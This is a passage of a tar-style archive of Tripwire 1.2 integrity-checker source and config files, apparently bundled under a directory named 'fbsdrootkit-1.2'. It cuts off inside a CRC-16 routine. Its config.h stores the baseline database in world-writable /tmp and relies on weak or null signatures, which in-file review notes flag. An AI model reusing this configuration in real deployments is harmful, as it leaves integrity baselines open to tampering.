#/etc/named.boot R # may not exist /etc/opt R /etc/passwd L /etc/profile R /etc/remote R /etc/rmtab L /etc/rpc R =/etc/saf L /etc/shadow L /etc/system R /etc/ttydefs L /etc/ttysrch R /hsfsboot R /kernel R /opt R /sbin R /ufsboot R /usr/sbin R =/var L =/var/adm L /var/adm/utmp L /var/adm/wtmp L /var/adm/wtmpx L /var/adm/sulog L =/var/adm/sa L =/var/spool L # Checksumming the following is not so critical. However, # setuid/setgid files are special-cased further down. 
=/usr L /usr/aset R-2 /usr/bin R-2 /usr/ccs R-2 /usr/kernel R-2 /usr/lib R-2 /usr/ucb R-2 /usr/openwin/bin R-2 # You may or may not have the following #/usr/ftp L #/usr/ftp/bin R #/usr/ftp/etc R # put entries in for /var/yp if you need it # put entries for uucp if you need them # put entries for /var/adm if you need it =/tmp L =/var/tmp L =/proc L # Here are entries for setuid/setgid files. On these, we use # both signatures just to be sure. # # You may want/need to edit this list. Batteries not inc. /usr/bin/at R /usr/bin/atq R /usr/bin/atrm R /usr/bin/chkey R /usr/bin/crontab R /usr/bin/ct R /usr/bin/cu R /usr/bin/eject R /usr/bin/login R /usr/bin/mail R /usr/bin/mailx R /usr/bin/netstat R /usr/bin/newgrp R /usr/bin/nfsstat R /usr/bin/passwd R /usr/bin/ps R /usr/bin/rcp R /usr/bin/rsh R /usr/bin/rdist R /usr/bin/rlogin R /usr/bin/su R /usr/bin/tip R /usr/bin/uucp R /usr/bin/uuglist R /usr/bin/uuname R /usr/bin/uustat R /usr/bin/uux R /usr/bin/volcheck R /usr/bin/w R /usr/bin/write R /usr/bin/yppasswd R /usr/ucb/ps R # Some other /usr/bin programs you may also wish to check /usr/bin/csh R /usr/bin/jsh R /usr/bin/kdestroy R /usr/bin/keylogin R /usr/bin/keylogout R /usr/bin/kinit R /usr/bin/klist R /usr/bin/ksh R /usr/bin/ksrvtgt R /usr/bin/rksh R /usr/bin/sh R fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.ultrix100600 764 764 2510 5474057112 17560 0ustar dfdf# $Id: tw.conf.ultrix,v 1.4 1993/11/22 06:38:02 genek Exp $ # # Submitted by: Edward DeHart # # kernel # /vmunix # # access files # /usr/bin/login /usr/bin/su # # system config # /etc/crontab /etc/exports /etc/disktab /etc/fstab /etc/gettytab /etc/hosts /etc/hosts.equiv /etc/hosts.lpd /etc/inetd.conf /etc/printcap /etc/rc /etc/rc.local /etc/resolv.conf /etc/sendmail.cf /etc/services /etc/svc.conf /etc/ttys # # config files for daemon wrapper # uncomment if using wrapper # #/etc/hosts.allow #/etc/hosts.deny # # Protect these two files if you are running ntp: # /etc/ntp.conf /usr/etc/ntpd # # network daemons # 
/usr/etc/fingerd /usr/etc/mountd /usr/etc/ftpd /usr/etc/telnetd /usr/etc/rlogind /usr/etc/rshd /usr/etc/nfsd /usr/etc/nfsportmon /usr/etc/nfssetlock /usr/etc/nfssetup /usr/etc/nfsstat /usr/etc/ntpd /usr/lib/sendmail /usr/etc/rexecd /usr/etc/snmpd /usr/etc/tcpd # # clients # /usr/ucb/finger /usr/ucb/ftp /usr/ucb/rcp /usr/ucb/rlogin /usr/ucb/rsh /usr/ucb/ruptime /usr/ucb/rwho /usr/ucb/talk /usr/ucb/telnet /usr/ucb/tftp # # programs # /usr/etc/ntp /usr/etc/portmap /usr/etc/quot /usr/bin/mail /usr/bin/wall /usr/bin/sh5 /bin/sh /bin/csh /usr/local/bin/tcsh # ### These files should be protected if you ### have Ultrix Upgraded or Enhanced security ### installed. /etc/sec/audit_events /etc/sec/auditd /etc/sec/auditmask fbsdrootkit-1.2/tripwire-1.2/databases/ 40700 764 764 0 5630552014 15126 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/include/ 40700 764 764 0 5630552014 14622 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/include/config.h100600 764 764 11673 5611466334 16377 0ustar dfdf/* $Id: config.h,v 1.5 1994/07/15 11:02:52 gkim Exp $ */ /* * config.h * * Tripwire configuration file * * Gene Kim * Purdue University */ /*** *** Operating System specifics *** *** Look in the .,/configs directory, and include appropriate header *** file that corresponds with your operating system. ***/ #include "../configs/conf-svr4.h" #ifdef TW_TYPE32 typedef TW_TYPE32 int32; typedef unsigned TW_TYPE32 uint32; #else typedef long int32; typedef unsigned long uint32; #endif /*** *** SYSTEM SPECIFIC Tripwire Configuration ***/ /******* signature functions ***************************************** * * Choose among these: * * sig_md5_get : MD5 function * (the RSA Data Security, Inc. 
MD5 Message-
 *                        Digesting Algorithm)
 *      sig_snefru_get  : Snefru function
 *                        (the Xerox Secure Hash Function)
 *      sig_null_get    : null function (returns 0 for all)
 *
 *  By default, Tripwire uses
 *      int (pf_signature0)() = sig_null_get;
 *      int (pf_signature1)() = sig_md5_get;
 *      int (pf_signature2)() = sig_snefru_get;
 *
 *  However, since Snefru is comparatively computationally expensive, you
 *  might consider using only MD5.  This can be done in the configuration,
 *  however, and should not be done by defining away the signature here.
 *
 *  You can replace one of the signature algorithms with another of your
 *  own choice by adding it to the build procedure, and putting it in
 *  here in place of one of these standard routines.  See the design
 *  document for hints on this.
 *
 *  To do this, just set one of the signature function pointers to
 *  your own function.
 *
 *********************************************************************/

/*
 * Signature slot table: SIGnFUNC names the routine bound to slot n and
 * SIGnNAME the label used for it.  Slots 0 and 9 are both bound to
 * sig_null_get / "nullsig", which the comment above describes as returning
 * 0 for every input, so those slots provide no integrity check.
 *
 * NOTE(review): crc32 and crc16 are error-detecting checksums rather than
 * cryptographic hashes, and MD2, MD4 and MD5 have published collision
 * attacks.  None of them should be relied on alone to detect deliberate
 * tampering; a database meant to resist an attacker should enable at least
 * one digest that is still considered collision-resistant.  Which SHA
 * revision sig_sha_get implements is not visible here -- confirm.
 */
#define SIG0FUNC sig_null_get
#define SIG1FUNC sig_md5_get
#define SIG2FUNC sig_snefru_get
#define SIG3FUNC sig_crc32_get
#define SIG4FUNC sig_crc_get
#define SIG5FUNC sig_md4_get
#define SIG6FUNC sig_md2_get
#define SIG7FUNC sig_sha_get
#define SIG8FUNC sig_haval_get
#define SIG9FUNC sig_null_get

#define SIG0NAME "nullsig"
#define SIG1NAME "md5"
#define SIG2NAME "snefru"
#define SIG3NAME "crc32"
#define SIG4NAME "crc16"
#define SIG5NAME "md4"
#define SIG6NAME "md2"
#define SIG7NAME "sha"
#define SIG8NAME "haval"
#define SIG9NAME "nullsig"

/******* path to Tripwire files **************************************
 *
 *  Ideally, CONFIG_PATH and DATABASE_PATH should be pointing to
 *  some read-only media, or some filesystem mounted remotely
 *  from a "secure-server".  (See design document for details.)
 *
 *  Note:  No trailing '/' in the paths!
* *********************************************************************/

/*
#if !defined(SYSV) || (defined(SYSV) && (SYSV > 2))
# define CONFIG_PATH "/usr/adm/tcheck"
# define DATABASE_PATH "/usr/adm/tcheck/databases"
#else
# define CONFIG_PATH "/usr/local/adm/tcheck"
# define DATABASE_PATH "/usr/local/adm/tcheck/databases"
#endif
*/

/*
 * NOTE(review): this copy overrides the commented-out system defaults above
 * and keeps both the configuration file and the baseline database under
 * /tmp/genek.  /tmp is normally writable by every local user, so a baseline
 * stored there can be edited or replaced, and every later integrity check
 * would then compare against untrusted data.  The guidance in the comment
 * block that precedes these defines (read-only media, or a filesystem
 * mounted from a secure server) should be applied before trusting a binary
 * built from this header.
 */
#define CONFIG_PATH "/tmp/genek"
#define DATABASE_PATH "/tmp/genek"

/******* name of Tripwire files **************************************
 *
 * Static filenames are nice, but we allow run-time binding to
 * support multiple hosts sharing the same directory (without
 * having to recompile).
 *
 * Use the '@' character to represent the hostname of the machine
 * running Tripwire.
 *
 * For example "tw.db_@" would expand to:
 *
 * tw.db_mentor.cc.purdue.edu
 *
 *********************************************************************/

#define CONFIG_FILE "tw.config"
#define DATABASE_FILE "tw.db_@"

/******* Default ignore mask ****************************************
 *
 * Usually, the only thing you want to ignore is the access time
 * stamp. But there may be applications where you want to know
 * about any accesses, too.
 *
 * Similarly, there may be some environments where you can have a much
 * more forgiving ignore mask.
 *
 * By default, Tripwire uses:
 * "R" -- read-only files, where only the access time
 * stamp can change.
 * Alternatively, you might want to make the default be "R-2"
 * This would be faster than simply "R", at some small loss
 * (perhaps) of protection.
 *
 * NOTE: Users with backup programs that read through the file
 * system rather than the raw disk (e.g., bru and cpio) should
 * add a "-c" to the DEFAULTIGNORE string. Otherwise, every file
 * will be reported as changed after backups.
 *
 *********************************************************************/

/*
 * NOTE(review): the value below is the "R" template with signatures 3-9
 * subtracted, which leaves at most signatures 0-2 (nullsig, md5, snefru
 * per the SIGnNAME table earlier in this file) in effect by default.
 * Presumably the exact expansion of "R" is decided in ignorevec.c; confirm
 * there before changing it.
 */
#define DEFAULTIGNORE "R-3456789"

/******* Temporary file template ************************************
 *
 * Usually, temporary files are stored in /tmp.
You may want * to use a different directory if your system does not support * the BSD "sticky" bit on directories. (i.e., only owner or root * can rename or delete files.) * * Make sure that there are at least 6 X's in the template. * Each consecutive X signifies a number that mktemp() can * fill in with a random number. * *********************************************************************/ #define TEMPFILE_TEMPLATE "/tmp/twzXXXXXX" fbsdrootkit-1.2/tripwire-1.2/include/list.h100600 764 764 3460 5611466335 16061 0ustar dfdf/* $Id: list.h,v 1.5 1994/07/15 11:02:53 gkim Exp $ */ /* #define LIST_HASHSZ 17011 */ #define LIST_HASHSZ 6007 /* a more reasonable hash size */ /* Thanks to Paul Hilchey for cleaning this up */ /* data node: these get linked into both a doubly linked list (using next and prev) and a chained hash table (using cnext) */ struct list_elem { char *varname; char *varvalue; int priority; int flag; struct list_elem *next; /* pointer to next entry on list */ struct list_elem *prev; /* pointer to prev entry on list */ struct list_elem *cnext; /* pointer to next entry on chain */ }; /* hash list: NULL pointers are used instead of list/chain sentinels */ struct list { struct list_elem *p_head; /* head of linked list */ struct list_elem *p_tail; /* tail of linked list */ struct list_elem *p_curr; /* current element for list traversal */ struct list_elem *hashtable[LIST_HASHSZ]; /* hash chains */ }; typedef struct list list; /* prototypes */ /* Do not remove this line. Protyping depends on it! 
*/ #if defined(__STDC__) || defined(__cplusplus) #define P_(s) s #else #define P_(s) () #endif /* list.c */ void list_set P_((char *pc_name, char *pc_value, int priority, struct list **pp_list)); char *list_lookup P_((char *pc_name, struct list **pp_list)); int list_isthere P_((char *pc_name, struct list **pp_list)); void list_unset P_((char *pc_name, struct list **pp_list)); int list_setflag P_((char *pc_name, int flag, struct list **pp_list)); int list_getflag P_((char *pc_name, struct list **pp_list)); void list_print P_((struct list **pp_list)); void list_reset P_((struct list **pp_list)); int list_init P_((void)); int list_open P_((struct list **pp_list)); struct list_elem *list_get P_((struct list **pp_list)); int list_close P_((struct list **pp_list)); #undef P_ fbsdrootkit-1.2/tripwire-1.2/include/patchlevel.h100600 764 764 124 5547647751 17222 0ustar dfdf/* $Id: patchlevel.h,v 1.11 1994/04/03 23:23:21 gkim Exp $ */ #define PATCHLEVEL 2 fbsdrootkit-1.2/tripwire-1.2/include/sigs.h100600 764 764 1144 5503640072 16040 0ustar dfdf/* $Id: sigs.h,v 1.3 1993/12/15 16:50:02 genek Exp $ */ /* * sigs.h * * common header definitions for signature wrappers. * * Gene Kim * Purdue University * October 12, 1992 */ #include #include #if !defined(SYSV) || (SYSV > 3) # include #else # include #endif /* SYSV */ #if (defined(SYSV) && (SYSV < 3)) # include # include #endif /* SVR2 */ #ifndef SEEK_SET # define SEEK_SET L_SET #endif char *pltob64(); extern int printhex; /* prototypes */ #ifdef __STDC__ int sig_null_get(int, char *, int); #else int sig_null_get(); #endif fbsdrootkit-1.2/tripwire-1.2/include/tripwire.h100600 764 764 20434 5614761222 16767 0ustar dfdf/* $Id: tripwire.h,v 1.32 1994/07/25 16:04:34 gkim Exp $ */ /************************************************************************ * * All files in the distribution of Tripwire are Copyright 1992, 1993 by * the Purdue Research Foundation of Purdue University. All rights * reserved. 
Some individual files in this distribution may be covered * by other copyrights, as noted in their embedded comments. * * Redistribution and use in source and binary forms are permitted * provided that this entire copyright notice is duplicated in all such * copies, and that any documentation, announcements, and other * materials related to such distribution and use acknowledge that the * software was developed at Purdue University, W. Lafayette, IN by * Gene Kim and Eugene Spafford. No charge, other than an "at-cost" * distribution fee, may be charged for copies, derivations, or * distributions of this material without the express written consent * of the copyright holder. Neither the name of the University nor the * names of the authors may be used to endorse or promote products * derived from this material without specific prior written * permission. THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE * IMPLIED WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR ANY PARTICULAR * PURPOSE. 
* ************************************************************************/ /* * tripwire.h * * common definitions for Tripwire * * Gene Kim * Purdue University */ /* version information */ #define VERSION_NUM "1.2" #define DB_VERSION_NUM 4 /* For signature routines prototypes: */ #include "../sigs/snefru/snefru.h" #include "../sigs/md5/md5.h" #include "../sigs/crc32/crc32.h" #include "../sigs/crc/crc.h" #include "../sigs/md2/md2.h" #include "../sigs/md4/md4.h" #include "../sigs/sha/sha.h" #include "../sigs/haval/haval.h" /* essential includes common to all sources files */ #include /* get any missing inode typedefs */ #include "../include/inode.h" /* database record format */ /* filename: (entrynumber, ignorevec, st_mode, st_ino, st_nlink, * st_uid, st_gid, st_size, * ltob64(statbuf->st_atime, vec64_a), * ltob64(statbuf->st_mtime, vec64_m), * ltob64(statbuf->st_ctime, vec64_c), sig0, sig1, ..., sig9 */ # define DB_RECORD_FORMAT "%ld %s %lo %lu %lu %lu %lu %lu %s %s %s %s %s %s %s %s %s %s %s %s %s\n" #define DB_RECORD_FIELDS 21 /* system defaults */ extern int db_version_num; extern char *config_file; extern char *config_path; extern char *database_file; extern char *database_path; extern char tempdatabase_file[]; extern FILE *fptempdbase; extern int debuglevel, verbosity, quietmode, printpreprocess; extern int test_interactive; extern char *specified_dbasefile, *specified_configfile; extern int specified_configfd, specified_dbasefd; extern int specified_configmode, specified_dbasemode; extern char *progname; extern char *defaultignore; extern char *db_record_format; extern struct list *olddbase_list; extern struct list *toc_list; extern char *version_num; extern char backupfile[]; extern int printhex; extern int runtimeignore; extern int loosedir; /* debugging verbosity */ #define SPDEBUG(x) if (debuglevel >= (x)) #define TRUE 1 #define FALSE 0 #define SIG_MAX_LEN 200 /* ignore vector flags */ /* note: as an optimization, IGNORE_0 .. IGNORE_9 are ordered. 
* do not change the ordering of these vectors! */ #define IGNORE_P 0x1 #define IGNORE_I 0x2 #define IGNORE_N 0x4 #define IGNORE_U 0x8 #define IGNORE_G 0x10 #define IGNORE_S 0x20 #define IGNORE_A 0x40 #define IGNORE_M 0x80 #define IGNORE_C 0x100 #define IGNORE_0 0x200 #define IGNORE_1 0x400 #define IGNORE_2 0x800 #define IGNORE_3 0x1000 #define IGNORE_4 0x2000 #define IGNORE_5 0x4000 #define IGNORE_6 0x8000 #define IGNORE_7 0x10000 #define IGNORE_8 0x20000 #define IGNORE_9 0x40000 #define IGNORE_0_9 (IGNORE_0|IGNORE_1|IGNORE_2|IGNORE_3|IGNORE_4|IGNORE_5|IGNORE_6|IGNORE_7|IGNORE_8|IGNORE_9) #define IGNORE_GROW 0x80000 /* growing log files */ /* filelist flags */ #define FLAG_CHANGED 1 #define FLAG_NOOPEN 2 #define FLAG_SYMLINK 4 #define FLAG_SEEN 8 #define FLAG_UPDATE 16 #define FLAG_UNCHANGE 32 #define FLAG_DELETE 64 /* prunelist flags */ #define PRUNE_ALL 1 #define PRUNE_ONE 2 /* database_build() modes */ #define DBASE_PERMANENT 0 #define DBASE_TEMPORARY 1 #define DBASE_UPDATE 2 /* database update modes */ #define UPDATE_INVALID 0 #define UPDATE_ADDFILE 1 #define UPDATE_DELETEFILE 2 #define UPDATE_UPDATEFILE 3 #define UPDATE_NOTFOUND 4 #define UPDATE_ADDENTRY 5 #define UPDATE_DELETEENTRY 6 #define UPDATE_UPDATEENTRY 7 /* define specified file modes */ #define SPECIFIED_NONE 0 #define SPECIFIED_FILE 1 #define SPECIFIED_FD 2 /* diff lists */ extern struct list *diff_added_list, *diff_deleted_list, *diff_changed_list; extern int diff_added_num, diff_changed_num, diff_deleted_num, diff_unignored_num; extern int files_scanned_num; /* diff parsing */ struct diff_bucket { int arg1, arg2, arg3, arg4; int diffmode; }; /* diff_parsing() types */ #define DIFF_SAME 0 #define DIFF_CHANGED 1 #define DIFF_ADDED 2 #define DIFF_DELETED 3 /* signature functions */ #define NUM_SIGS 10 extern int (*pf_signatures[NUM_SIGS]) (); extern char *signames[NUM_SIGS]; /* prototypes */ /*** Do not remove this line. Protyping depends on it! 
***/ #if defined(__STDC__) || defined(__cplusplus) #define P_(s) s #else #define P_(s) () #endif /* config.parse.c */ void configfile_read P_((struct list **pp_list, struct list **pp_entry_list)); /* main.c */ int main P_((int argc, char *argv[])); /* list.c */ void list_set P_((char *pc_name, char *pc_value, int priority, struct list **pp_list)); char *list_lookup P_((char *pc_name, struct list **pp_list)); int list_isthere P_((char *pc_name, struct list **pp_list)); void list_unset P_((char *pc_name, struct list **pp_list)); int list_setflag P_((char *pc_name, int flag, struct list **pp_list)); int list_getflag P_((char *pc_name, struct list **pp_list)); void list_print P_((struct list **pp_list)); void list_reset P_((struct list **pp_list)); int list_init P_((void)); int list_open P_((struct list **pp_list)); struct list_elem *list_get P_((struct list **pp_list)); int list_close P_((struct list **pp_list)); /* ignorevec.c */ int ignore_vec_to_scalar P_((char *s)); void ignore_configvec_to_dvec P_((char *s)); /* dbase.build.c */ void database_build P_((struct list **pp_list, int mode, struct list **pp_entry_list)); /* utils.c */ void warn_with_err P_((char *format, char *name)); void die_with_err P_((char *format, char *name)); void filename_hostname_expand P_((char **ps)); int slash_count P_((char *pathname)); int string_split_space P_((char *string, char *s, char *t)); int string_split_ch P_((char *string, char *s, char *t, int ch)); void chop P_((char *s)); void filename_escape_expand P_((char *filename)); char *filename_escape P_((char *filename)); char *pltob64 P_((uint32 *pl, char *pcout, int numlongs)); char *btob64 P_((register unsigned char *pcbitvec, register char *pcout, int numbits)); int32 b64tol P_((char *vec)); int32 oldb64tol P_((char *vec)); void direntry_print P_((char *name, struct stat statbuf, int mode)); int fd_tempfilename_generate P_((void)); int fd_copy_to_tmp P_((int fdin)); int file_copy_to_tmp P_((char *filename)); int file_to_fd 
P_((char *filename)); /* preen.c */ void update_gather P_((int interactive, char ***ppp_updateentries)); void update_mark P_((char **ppentry, int num)); void dbase_entry_howclose P_((char *filename, struct list **ppentrylist, char *pentryname, int *pentrynum)); /* preen.interp.c */ void preen_interp P_((FILE *fpin)); /* preen.report.c */ void preen_report P_((int interactive, char ***ppp_updateentries)); /* nullsig.c */ int sig_null_get P_((int fd_in, char *ps_signature, int siglen)); /* config.prim.c */ void tw_mac_define P_((char *varname, char *varvalue)); char *tw_mac_dereference P_((char *varname)); void tw_mac_undef P_((char *varname)); int tw_mac_ifdef P_((char *varname)); int tw_mac_ifhost P_((char *hostname)); /* dbase.update.c */ void dbase_entry_flag P_((struct list **pp_list, int flagentry, int orflag, char *ignore)); /* config.pre.c */ void tw_macro_parse P_((char *filename, FILE *fpin, FILE *fpout, struct list **pp_entry_list)); /* help.c */ void tw_help_print P_((FILE *fpout)); fbsdrootkit-1.2/tripwire-1.2/lib/ 40700 764 764 0 5630552014 13745 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/lib/tw.config100600 764 764 10210 5474057116 15710 0ustar dfdf# $Id: tw.config,v 1.4 1993/11/22 06:38:06 genek Exp $ # # tw.config # # This file contains a list of files and directories that System # Preener will scan. Information collected from these files will be # stored in the tw.database file. # # Format: [!|=] entry [ignore-flags] # # where: '!' signifies the entry is to be pruned (inclusive) from # the list of files to be scanned. # '=' signifies the entry is to be added, but if it is # a directory, then all its contents are pruned # (useful for /tmp). # # where: entry is the absolute pathname of a file or a directory # # where ignore-flags are in the format: # [template][ [+|-][pinugsam12] ... 
] # # - : ignore the following atributes # + : do not ignore the following attributes # # p : permission and file mode bits a: access timestamp # i : inode number m: modification timestamp # n : number of links (ref count) c: inode creation timestamp # u : user id of owner 1: signature 1 # g : group id of owner 2: signature 2 # s : size of file # # # Ex: The following entry will scan all the files in /etc, and report # any changes in mode bits, inode number, reference count, uid, # gid, modification and creation timestamp, and the signatures. # However, it will ignore any changes in the access timestamp. # # /etc +pinugsm12-a # # The following templates have been pre-defined to make these long ignore # mask descriptions unecessary. # # Templates: (default) R : [R]ead-only (+pinugsm12-a) # L : [L]og file (+pinug-sam12) # N : ignore [N]othing (+pinusgsamc12) # E : ignore [E]verything (-pinusgsamc12) # > : like [L], but ignore growing files # # By default, Tripwire uses the R template -- it ignores # only the access timestamp. # # You can use templates with modifiers, like: # Ex: /etc/lp E+ug # # Example configuration file: # /etc R # all system files # !/etc/lp R # ...but not those logs # =/tmp N # just the directory, not its files # # ==== # # Preprocessor directives: # # The following directives provide C-preprocessor and m4-like # functionality: # # @@ifhost hostname : included if (hostname) matches # @@ifhost hostname : included if (hostname) doesn't # match. # (both need matching @@endif) # # @@define x : defines (x) # @@undef x : undefines (x) # # @@ifdef x : included if (x) is defined. # @@ifndef x : included if (x) is not defined. # (both need matching @@endif) # # @@endif : closes up @@ifhost, @@ifdef, # and @@ifndef. # # Example: # A host-dependent inclusion can be specified many ways so tw.config # files can be shared among multiple machines. 
So, if the machine # "mentor.cc.purdue.edu" is the only machine that has a certain file, # you could use: # # @@ifhost mentor.cc.purdue.edu # /etc/tw.log.mentor R # @@endif # /tmp/genek/tripwire-1.0 R+0123456789-ugpmci /tmp/genek/tripwire-1.0/tests E /tmp/genek/tripwire-1.0/tw.config E /tmp/genek/tripwire-1.0/databases E /tmp/genek/tripwire-1.0/src/config.parse.o /tmp/genek/tripwire-1.0/src/main.o /tmp/genek/tripwire-1.0/src/list.o /tmp/genek/tripwire-1.0/src/ignorevec.o /tmp/genek/tripwire-1.0/src/dbase.build.o /tmp/genek/tripwire-1.0/src/utils.o /tmp/genek/tripwire-1.0/src/preen.o /tmp/genek/tripwire-1.0/src/preen.interp.o /tmp/genek/tripwire-1.0/src/preen.report.o /tmp/genek/tripwire-1.0/src/nullsig.o /tmp/genek/tripwire-1.0/src/config.prim.o /tmp/genek/tripwire-1.0/src/dbase.update.o /tmp/genek/tripwire-1.0/src/sigfetch.o /tmp/genek/tripwire-1.0/src/config.pre.o /tmp/genek/tripwire-1.0/sigs/crc/crc.o /tmp/genek/tripwire-1.0/sigs/crc32/crc32.o /tmp/genek/tripwire-1.0/sigs/md2/md2wrapper.o /tmp/genek/tripwire-1.0/sigs/md2/md2.o /tmp/genek/tripwire-1.0/sigs/md4/md4.o /tmp/genek/tripwire-1.0/sigs/md4/md4wrapper.o /tmp/genek/tripwire-1.0/sigs/md5/md5.o /tmp/genek/tripwire-1.0/sigs/md5/md5wrapper.o /tmp/genek/tripwire-1.0/sigs/snefru/snefru.o !/tmp/genek/tripwire-1.0/aux/types !/tmp/genek/tripwire-1.0/aux/byteorder !/tmp/genek/tripwire-1.0/src/config.lex.c !/tmp/genek/tripwire-1.0/src/config.pre.c !/tmp/genek/tripwire-1.0/Makefile !/tmp/genek/tripwire-1.0/include/config.h !/tmp/genek/tripwire-1.0/include/byteorder.h !/tmp/genek/tripwire-1.0/include/inode.h fbsdrootkit-1.2/tripwire-1.2/sigs/ 40700 764 764 0 5630552015 14145 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/sigs/crc/ 40700 764 764 0 5630552015 14714 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/sigs/crc/Makefile100600 764 764 362 5474057122 16441 0ustar dfdf# $Id: Makefile,v 1.3 1993/11/22 06:38:10 genek Exp $ # # Makefile for crc32 wrapper # # Gene Kim # Purdue University # October 18, 1992 # all: crc.o .c.o: $(CC) 
$(CFLAGS) -c $< clean: -rm -rf *.o .pure crc.o: ../../include/byteorder.h fbsdrootkit-1.2/tripwire-1.2/sigs/crc/crc.c100600 764 764 14717 5614757123 15771 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: crc.c,v 1.6 1994/07/25 15:46:27 gkim Exp $"; #endif /* * crc.c * * signature function hook for CRC-16. * * Gene Kim * Purdue University * October 14, 1992 */ /* ============================================================= */ /* COPYRIGHT (C) 1986 Gary S. Brown. You may use this program, or */ /* code or tables extracted from it, as desired without restriction. */ /* */ /* First, the polynomial itself and its table of feedback terms. The */ /* polynomial is */ /* X^32+X^26+X^23+X^22+X^16+X^12+X^11+X^10+X^8+X^7+X^5+X^4+X^2+X^1+X^0 */ /* */ /* Note that we take it "backwards" and put the highest-order term in */ /* the lowest-order bit. The X^32 term is "implied"; the LSB is the */ /* X^31 term, etc. The X^0 term (usually shown as "+1") results in */ /* the MSB being 1. */ /* */ /* Note that the usual hardware shift register implementation, which */ /* is what we're using (we're merely optimizing it by doing eight-bit */ /* chunks at a time) shifts bits into the lowest-order term. In our */ /* implementation, that means shifting towards the right. Why do we */ /* do it this way? Because the calculated CRC must be transmitted in */ /* order from highest-order term to lowest-order term. UARTs transmit */ /* characters in order from LSB to MSB. By storing the CRC this way, */ /* we hand it to the UART in the order low-byte to high-byte; the UART */ /* sends each low-bit to hight-bit; and the result is transmission bit */ /* by bit from highest- to lowest-order term without requiring any bit */ /* shuffling on our part. Reception works similarly. */ /* */ /* The feedback terms table consists of 256, 32-bit entries. Notes: */ /* */ /* The table can be generated at runtime if desired; code to do so */ /* is shown later. 
It might not be obvious, but the feedback */ /* terms simply represent the results of eight shift/xor opera- */ /* tions for all combinations of data and CRC register values. */ /* */ /* The values must be right-shifted by eight bits by the "updcrc" */ /* logic; the shift must be unsigned (bring in zeroes). On some */ /* hardware you could probably optimize the shift in assembler by */ /* using byte-swap instructions. */ /* polynomial $edb88320 */ /* */ /* -------------------------------------------------------------------- */ #include "../../include/config.h" #include #include #ifdef STDLIBH #include #include #endif #include "../../include/sigs.h" #define BUFSIZE 4096 static unsigned int crc16; static unsigned int crc16tab[256] = { 0x0000, 0xC0C1, 0xC181, 0x0140, 0xC301, 0x03C0, 0x0280, 0xC241, 0xC601, 0x06C0, 0x0780, 0xC741, 0x0500, 0xC5C1, 0xC481, 0x0440, 0xCC01, 0x0CC0, 0x0D80, 0xCD41, 0x0F00, 0xCFC1, 0xCE81, 0x0E40, 0x0A00, 0xCAC1, 0xCB81, 0x0B40, 0xC901, 0x09C0, 0x0880, 0xC841, 0xD801, 0x18C0, 0x1980, 0xD941, 0x1B00, 0xDBC1, 0xDA81, 0x1A40, 0x1E00, 0xDEC1, 0xDF81, 0x1F40, 0xDD01, 0x1DC0, 0x1C80, 0xDC41, 0x1400, 0xD4C1, 0xD581, 0x1540, 0xD701, 0x17C0, 0x1680, 0xD641, 0xD201, 0x12C0, 0x1380, 0xD341, 0x1100, 0xD1C1, 0xD081, 0x1040, 0xF001, 0x30C0, 0x3180, 0xF141, 0x3300, 0xF3C1, 0xF281, 0x3240, 0x3600, 0xF6C1, 0xF781, 0x3740, 0xF501, 0x35C0, 0x3480, 0xF441, 0x3C00, 0xFCC1, 0xFD81, 0x3D40, 0xFF01, 0x3FC0, 0x3E80, 0xFE41, 0xFA01, 0x3AC0, 0x3B80, 0xFB41, 0x3900, 0xF9C1, 0xF881, 0x3840, 0x2800, 0xE8C1, 0xE981, 0x2940, 0xEB01, 0x2BC0, 0x2A80, 0xEA41, 0xEE01, 0x2EC0, 0x2F80, 0xEF41, 0x2D00, 0xEDC1, 0xEC81, 0x2C40, 0xE401, 0x24C0, 0x2580, 0xE541, 0x2700, 0xE7C1, 0xE681, 0x2640, 0x2200, 0xE2C1, 0xE381, 0x2340, 0xE101, 0x21C0, 0x2080, 0xE041, 0xA001, 0x60C0, 0x6180, 0xA141, 0x6300, 0xA3C1, 0xA281, 0x6240, 0x6600, 0xA6C1, 0xA781, 0x6740, 0xA501, 0x65C0, 0x6480, 0xA441, 0x6C00, 0xACC1, 0xAD81, 0x6D40, 0xAF01, 0x6FC0, 0x6E80, 0xAE41, 0xAA01, 0x6AC0, 0x6B80, 0xAB41, 0x6900, 
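0xA9C1, 0xA881, 0x6840, 0x7800, 0xB8C1, 0xB981, 0x7940, 0xBB01, 0x7BC0, 0x7A80, 0xBA41, 0xBE01, 0x7EC0, 0x7F80, 0xBF41, 0x7D00, 0xBDC1, 0xBC81, 0x7C40, 0xB401, 0x74C0, 0x7580, 0xB541, 0x7700, 0xB7C1, 0xB681, 0x7640, 0x7200, 0xB2C1, 0xB381, 0x7340, 0xB101, 0x71C0, 0x7080, 0xB041, 0x5000, 0x90C1, 0x9181, 0x5140, 0x9301, 0x53C0, 0x5280, 0x9241, 0x9601, 0x56C0, 0x5780, 0x9741, 0x5500, 0x95C1, 0x9481, 0x5440, 0x9C01, 0x5CC0, 0x5D80, 0x9D41, 0x5F00, 0x9FC1, 0x9E81, 0x5E40, 0x5A00, 0x9AC1, 0x9B81, 0x5B40, 0x9901, 0x59C0, 0x5880, 0x9841, 0x8801, 0x48C0, 0x4980, 0x8941, 0x4B00, 0x8BC1, 0x8A81, 0x4A40, 0x4E00, 0x8EC1, 0x8F81, 0x4F40, 0x8D01, 0x4DC0, 0x4C80, 0x8C41, 0x4400, 0x84C1, 0x8581, 0x4540, 0x8701, 0x47C0, 0x4680, 0x8641, 0x8201, 0x42C0, 0x4380, 0x8341, 0x4100, 0x81C1, 0x8081, 0x4040 };

/*
 * UpdateCRC16 -- fold bufsize bytes from buffer into the file-scope crc16
 * accumulator, one table lookup per byte.
 *
 * A bufsize of zero or less is a no-op.  The earlier loop compared an
 * unsigned index with the signed count, so a negative count (for example a
 * failed read() result passed straight through) was converted to a very
 * large unsigned value and the loop ran far past the end of the buffer.
 */
static void
UpdateCRC16(buffer, bufsize)
    unsigned char *buffer;
    int bufsize;
{
    int i;
    unsigned int tmp;

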